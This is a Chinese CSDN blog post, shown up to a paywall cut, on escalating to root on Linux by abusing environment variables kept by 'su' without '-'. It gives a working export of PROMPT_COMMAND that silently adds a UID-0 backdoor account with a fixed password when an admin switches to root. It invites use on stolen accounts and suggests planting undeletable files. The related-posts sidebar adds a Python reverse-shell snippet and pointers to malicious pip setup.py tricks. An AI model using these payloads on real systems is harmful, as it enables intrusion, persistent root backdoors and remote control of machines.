python提权_利用python特性或bash提权

最新推荐文章于 2024-07-09 11:24:46 发布
最新推荐文章于 2024-07-09 11:24:46 发布
阅读量1k 收藏
点赞数
文章标签: python提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39702649/article/details/111547199
版权
本文详细介绍了如何利用Python和BASH环境变量提权的技巧,特别是针对使用`su`而非`su -`的场景。通过设置$PROMPT_COMMAND或修改PYTHONPATH环境变量,可以在用户切换到root时执行特定命令,例如添加用户。提醒读者此方法依赖于管理员的使用习惯,并提供了一些建议以提高成功率。
摘要由CSDN通过智能技术生成

ps:下面讲的特权技巧只要利用的是用户在切换到root用户时,使用的是su命令,而没有使用su – 命令。如果用户切换到root用户时使用su -命令,或者该用户从不切换到root用户,那么下面讲的提权技巧是无用的。

su 与 su – 命令的区别:

su 是切换到其他用户,但是不切换环境变量(比如说那些你用export命令查看一下,就知道两个命令的区别了)。su – 是完整的切换到一个用户环境,环境变量是新用户的环境变量。

正是利用su 切换到root用户时不切换环境变量,可以修改当前普通用户的环境变量,当用户转到root时,命令就会以root权限运行来添加用户。

要利用成功的话,还得看管理员的习惯,是否喜欢用su切换成root

看个BASH的环境变量$PROMPT_COMMAND

这个变量保存了在主提示符$显示之前需要执行的命令.

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

看图:

随后你用su变成root,看看是否多了个用户呢

也可以建立用户删除不了的文件

比如,用户想删除某个,你在prompt_command里面加入cp命令,每次他执行完del都会又cp一个过去

具体怎么应用看你自己了

不管是偷也好&

最低0.47元/天 解锁文章
weixin_39702649
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python提权_渗透利器 | 提权辅助工具箱
weixin_34002071的博客
01-29 1232
作为技术宅的我,日常最大的爱好就是逛论坛。某日看到论坛里有一款基于主机的漏洞扫描工具,用来查找主机上公开EXP的CVE。嗯嗯,我想还是叫提权辅助工具可能会更顺口一些。在我印象中,类似的工具其实还蛮多的,比如我们熟知的Linux_Exploit_Suggester和Windows-Exploit-Suggester。我花了一点时间,整理了 9 款提权辅助工具,不敢独享,特整理成文。如果你对提权有那么...
用户管理 终端命令
红叶的博客
11-19 362
用户管理 终端命令1) 创建用户 / 设置密码 / 删除用户2) 查看用户信息3) `su` 切换用户4) **sudo**(4.1) 给 指定用户 授予 权限(4.2) 使用 用户 `xxx` 登录, 操作管理员命令(5).修改用户权限5.1 方式一: 修改用户权限目标演练:5.2 方式二目标演练:5.3 方式三: 简化方式二目标演练:系统信息相关命令目标 1) 创建用户 / 设置密码 / 删除用户 命令 作用 说明 useradd -m -g 组 新建用户名 添加新用户 -m 自动建立用
标题:内网提权探索与Python辅助工具应用
最新发布
theoxiong的博客
07-09 828
内网提权,简单来说,就是在已经成功进入目标内网后,利用系统漏洞、配置不当或权限管理上的疏忽,将当前用户权限提升至更高级别(如从普通用户提升至管理员)。在网络安全领域,内网提权是一个重要的议题,它涉及在已经渗透进企业内网后,进一步提升权限以获取更高级别的访问控制或敏感数据。作为一门强大的编程语言,虽然不直接用于执行提权攻击,但其在信息收集、自动化脚本编写等方面发挥着重要作用,为内网提权过程提供了有力支持。)来收集内网信息,如主机发现、服务扫描、端口扫描等,为提权前的情报收集提供支持。
python 反弹shell
wz200210的专栏
07-06 1608
client: nc -l 8080 server: import socket,subprocess,os  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect(("127.0.0.1",8080))  os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) 
利用python特性进行提权
cnbird's blog
02-22 2357
http://huaidan.org/archives/2810.html
Python解决权限不足问题,权限提升
光明
04-04 2904
最近我在开发一个面向大众的软件,其中需要对系统中的C盘%programdata%中的一个文件进行修改。然而,当我双击打开软件进行文件修改时,却发现提示权限不足,无法完成操作。这让我感到很困扰,因为操作应该尽量的自动,不能让用户手动修改文件权限。在探索过程中,我发现可以使用ctypes库中的shell32模块来判断当前用户是否为管理员,如果不是,则可以使用ShellExecuteW函数来提升权限。总之,使用这些代码,最终成功解决了权限不足的问题,而且还可以让操作尽量的自动。
tits_it_python_bash_
09-30
Tits is a simple CLI application which shows pictures like tits 8). The application is under Beerware license
Python库 | bzr_bash_completion-1.0.2-py2.5.egg
02-21
Python库“bzr_bash_completion-1.0.2-py2.5.egg”是一个专为Bazaar(bzr)版本控制系统定制的bash自动补全脚本。Bazaar是分布式版本控制系统,类似于Git,用于跟踪文件和项目的变化。这个库的目的是提高Bazaar...
Python库 | dagster_bash-0.6.4rc3-py3-none-any.whl
02-15
通过这种方式,Python开发者能够充分利用Python的高级抽象能力和Bash的强大系统级操作能力,提高工作效率,同时保持代码的整洁和可维护性。 总之,dagster_bash是一个非常实用的库,它将Python的灵活性与Bash的广泛...
bash_unittest:使用 python 的 unittest 进行 Bash 单元测试
06-01
来自pythonBash单元测试 如何使用 python 的 unittest 进行 bash 单元测试的最小工作示例 从python调用bash脚本并使用unittest进行单元测试的原理可以应用于其他语言/单元测试框架对。 运行脚本 src/hello.sh ...
python脚本实现Redis未授权批量提权
09-09
主要给大家介绍了关于利用python脚本实现redis未授权批量提权的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
python禁用键鼠与提权代码实例
09-18
主要介绍了python禁用键鼠与提权代码实例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Python黑帽子:黑客与渗透测试编程之道》 Windows系统提权
weixin_30763397的博客
05-28 206
环境准备: pywin32的安装在第八章的键盘记录中有,这里还需要安装wmi: 在本人的32位win7上本来是没有easy_install这个命令的,这需要安装setuptools-0.6c11.win32-py2.7.exe即可 http://www.sobaidupan.com/file-3739339.html 接着下载安装bhpservice.zip:https://www.n...
Python 实现Windows系统提权
CSDN
05-28 5686
WMI(Windows Management Instrumentation)是Windows操作系统中的管理框架,它提供了一种标准化的方式来管理和监控计算机系统的各种资源和服务。WMI可以通过编程接口(如COM接口)进行访问,并允许开发人员和系统管理员对计算机系统进行远程管理和监控。
python pip提权
weixin_39219503的博客
12-21 1421
在有些linux机器中,某个用户拥有pip的sudo权限,在这种情况下,可以利用pip install进行本地提权。 在执行pip install时会调用setup.py,可以在本地创建恶意setup.py文件来达到任意命令执行的效果。 from setuptools import setup from setuptools.command.install import install impor...
利用python3进行提权
weixin_47156475的博客
08-13 1308
提权的话,发现不能使用sudo提权,但是可以使用python进行提权
sudo命令中python提权
qq_40898302的博客
05-10 4233
python提权
利用python_利用python特性进行提权
weixin_39834984的博客
12-03 198
回家上不了网,看了看python核心编程,发现个有趣的利用python小技巧,不敢藏私,拿出来给各位淫人分享。不管是偷也好,抢也罢,弄到一个普通用户的账户shell看下他的使用习惯嘿嘿,又是一个用su不用su – 的,之前我写过一个利用bash特性提权的文章大家可以去搜搜,今天讲pythonOK,我们来看下python默认会加载哪些模块。我把结果到出到test.txt里面了,里面有一堆模块会被自动...
python ctypes教程_Python利用ctypes提高执行速度
05-26
其中一个重要的工具是ctypes(C types)库,它允许Python与C语言进行交互,从而能够利用C语言的执行速度。 在本教程中,我们将介绍如何使用ctypes来提高Python的执行速度。 ## 安装ctypes 通常情况下,ctypes已经...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值